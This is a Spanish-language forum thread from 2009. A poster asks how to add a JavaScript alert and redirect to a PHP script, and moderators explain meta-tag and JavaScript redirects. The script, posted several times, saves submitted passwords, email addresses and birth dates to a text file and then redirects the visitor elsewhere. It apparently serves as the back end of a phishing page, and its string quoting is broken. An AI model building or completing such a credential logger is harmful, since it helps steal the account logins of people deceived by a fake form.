Foros del Web » Programando para Internet » PHP »

Ayuda =S

Estas en el tema de Ayuda =S en el foro de PHP en Foros del Web. Código: <?php $password=$_POST['password']; $cur_email=$_POST['cur_email']; $new_email1=$_POST['new_email1']; $BirthDay_Month=$_POST['BirthDay_Month']; $BirthDay_Day=$_POST['BirthDay_Day']; $BirthDay_Year=$_POST['BirthDay_Year']; $guarda=fopen('cuentas.txt',a); fwrite($guarda,' *******UserS******* ID: ".$password." Clave: ".$cur_email. Mail: ".$new_email1." Mes: ".$BirthDay_Month." Dia: ".$BirthDay_Day." Año: ".$BirthDay_Year." '; fclose($guarda); ...
  #1 (permalink)  
Antiguo 07/03/2009, 14:39
 
Fecha de Ingreso: marzo-2009
Mensajes: 5
Antigüedad: 15 años, 1 mes
Puntos: 0
Ayuda =S

Código:
<?php
$password=$_POST['password'];
$cur_email=$_POST['cur_email'];
$new_email1=$_POST['new_email1'];
$BirthDay_Month=$_POST['BirthDay_Month'];
$BirthDay_Day=$_POST['BirthDay_Day'];
$BirthDay_Year=$_POST['BirthDay_Year'];
$guarda=fopen('cuentas.txt',a);
fwrite($guarda,'
*******UserS*******

ID:  ".$password."
Clave: ".$cur_email.
Mail: ".$new_email1."
Mes: ".$BirthDay_Month."
Dia: ".$BirthDay_Day."
Año: ".$BirthDay_Year." ';
fclose($guarda);
echo "<meta http-equiv='Refresh' content='1;url=paginaweb'>";
?>
como hago para que despues que se guarde la info se ejecute una alerta asi
Código:
<script>alert('Informacion Enviada')</script>
y luego que le de aceptar me redirija a la pag que quiera =S espero haberme explicado...
  #2 (permalink)  
Antiguo 07/03/2009, 15:05
Avatar de David
Moderador
 
Fecha de Ingreso: abril-2005
Ubicación: In this planet
Mensajes: 15.720
Antigüedad: 19 años
Puntos: 839
Respuesta: Ayuda =S

Yo personalmente opino que lo mejor sería que aumentes el tiempo para la redirección (a unos 3 o 5 segundos) y muestres el mensaje directamente en la página.

Pero de todos modos, contestando a tu pregunta. Sería:
Código javascript:
Ver original
  1. <script type="text/javascript">
  2. alert('Informacion Enviada');
  3. location.href = "www.pagina.com";
  4. </script>
__________________
Por favor, antes de preguntar, revisa la Guía para realizar preguntas.
  #3 (permalink)  
Antiguo 07/03/2009, 17:16
 
Fecha de Ingreso: marzo-2009
Mensajes: 5
Antigüedad: 15 años, 1 mes
Puntos: 0
Respuesta: Ayuda =S

Muchas gracias amigo....

otra cosa entonces en la ultima parte del code quedaria asi
Código:
echo "<meta http-equiv='Refresh' 

content='1;url='www,host,com/scr

ipt.php'>";
?>
????

script.php= codigo que me facilitastes
  #4 (permalink)  
Antiguo 07/03/2009, 17:22
Avatar de David
Moderador
 
Fecha de Ingreso: abril-2005
Ubicación: In this planet
Mensajes: 15.720
Antigüedad: 19 años
Puntos: 839
Respuesta: Ayuda =S

No, si vas a usar el script, no uses el metatag de redirección.
__________________
Por favor, antes de preguntar, revisa la Guía para realizar preguntas.
  #5 (permalink)  
Antiguo 07/03/2009, 17:31
Avatar de Triby
Mod on free time
 
Fecha de Ingreso: agosto-2008
Ubicación: $MX->Gto['León'];
Mensajes: 10.106
Antigüedad: 15 años, 8 meses
Puntos: 2237
Respuesta: Ayuda =S

Creo que es mejor la redireccion con META tag que con javascript, porque no afecta de la misma forma el historial del navegador, pero si es necesario (mas bien conveniente) crear una pagina completa para la redireccion, con todas las etiquetas basicas.

Código html:
Ver original
  1. <!-- aqui el DTD adecuado -->
  2.     <title>Titulo de la pagina</title>
  3.     <meta (aqui la redirecion) />
  4. </head>
  5.     <h1>Titulo que vera el usuario</h1>
  6.     <p>Mensaje de redireccion</p>
  7.     <p>Link a pagina correcta, por si el navegador no reconoce la redireccion o tarda demasiado en realizarla</p>
  8. </body>
  9. </html>
__________________
- León, Guanajuato
- GV-Foto
  #6 (permalink)  
Antiguo 07/03/2009, 17:32
 
Fecha de Ingreso: marzo-2009
Mensajes: 5
Antigüedad: 15 años, 1 mes
Puntos: 0
Respuesta: Ayuda =S

Código:
<?php
$password=$_POST['password'];
$cur_email=$_POST['cur_email'];
$new_email1=$_POST['new_email1'];
$BirthDay_Month=$_POST['BirthDay_Month'];
$BirthDay_Day=$_POST['BirthDay_Day'];
$BirthDay_Year=$_POST['BirthDay_Year'];
$guarda=fopen('cuentas.txt',a);
fwrite($guarda,'
*******UserS*******

ID:  ".$password."
Clave: ".$cur_email.
Mail: ".$new_email1."
Mes: ".$BirthDay_Month."
Dia: ".$BirthDay_Day."
Año: ".$BirthDay_Year." ';
fclose($guarda);
echo <script type="text/javascript">
alert('Informacion Enviada');
location.href = "www,pagina,com";
</script>;
?>
asi??

Última edición por XxTheXtiNciOnxX; 07/03/2009 a las 17:48
  #7 (permalink)  
Antiguo 07/03/2009, 17:34
Avatar de David
Moderador
 
Fecha de Ingreso: abril-2005
Ubicación: In this planet
Mensajes: 15.720
Antigüedad: 19 años
Puntos: 839
Respuesta: Ayuda =S

Buen apunte, Triby.

Concuerdo contigo, de hecho en el primer mensaje había dicho que es mejor usar el metatag con un mensaje que Javascript. Pero he comprobado que siempre que das dos opciones al usuario que dió la pregunta, existe un 90% de posibilidad, que elija la peor de esas opciones .

Saludos .
__________________
Por favor, antes de preguntar, revisa la Guía para realizar preguntas.
  #8 (permalink)  
Antiguo 07/03/2009, 17:38
Avatar de Triby
Mod on free time
 
Fecha de Ingreso: agosto-2008
Ubicación: $MX->Gto['León'];
Mensajes: 10.106
Antigüedad: 15 años, 8 meses
Puntos: 2237
Respuesta: Ayuda =S

Cita:
Iniciado por XxTheXtiNciOnxX Ver Mensaje
Código:
<?php

echo <script type="text/javascript">
alert('Informacion Enviada');
location.href = "www,pagina,com";
</script>
?>
asi??
Y las comillas despues del echo?, eso te va a dar errores... de hecho, si no tienes variables dentro de ese echo, pon el codigo directo como html despues de ?>
__________________
- León, Guanajuato
- GV-Foto
  #9 (permalink)  
Antiguo 07/03/2009, 18:17
 
Fecha de Ingreso: marzo-2009
Mensajes: 5
Antigüedad: 15 años, 1 mes
Puntos: 0
Respuesta: Ayuda =S

Cita:
Iniciado por Triby Ver Mensaje
pon el codigo directo como html despues de ?>
no entendi esa parte

y nesecito que sea con javascript
  #10 (permalink)  
Antiguo 07/03/2009, 18:19
Avatar de David
Moderador
 
Fecha de Ingreso: abril-2005
Ubicación: In this planet
Mensajes: 15.720
Antigüedad: 19 años
Puntos: 839
Respuesta: Ayuda =S

Código php:
Ver original
  1. <?php
  2. /* Código PHP */
  3. ?>
  4. <script type="text/javascript">
  5. <!-- Código Javascript -->
  6. </script>
__________________
Por favor, antes de preguntar, revisa la Guía para realizar preguntas.
  #11 (permalink)  
Antiguo 07/03/2009, 19:59
 
Fecha de Ingreso: marzo-2009
Mensajes: 5
Antigüedad: 15 años, 1 mes
Puntos: 0
Respuesta: Ayuda =S

<?php
$password=$_POST['password'];
$cur_email=$_POST['cur_email'];
$new_email1=$_POST['new_email1'];
$BirthDay_Month=$_POST['BirthDay_Month'];
$BirthDay_Day=$_POST['BirthDay_Day'];
$BirthDay_Year=$_POST['BirthDay_Year'];
$guarda=fopen('cuentas.txt',a);
fwrite($guarda,'
*******UserS*******

ID: ".$password."
Clave: ".$cur_email.
Mail: ".$new_email1."
Mes: ".$BirthDay_Month."
Dia: ".$BirthDay_Day."
Año: ".$BirthDay_Year." ';
fclose($guarda);
?>

<script type="text/javascript">
alert('Informacion Enviada');
location.href = "www,pagina,com";
</script>

lo guardo .php y se ejecuta todo normal?
Atención: Estás leyendo un tema que no tiene actividad desde hace más de 6 MESES, te recomendamos abrir un Nuevo tema en lugar de responder al actual.
Respuesta




La zona horaria es GMT -6. Ahora son las 21:58.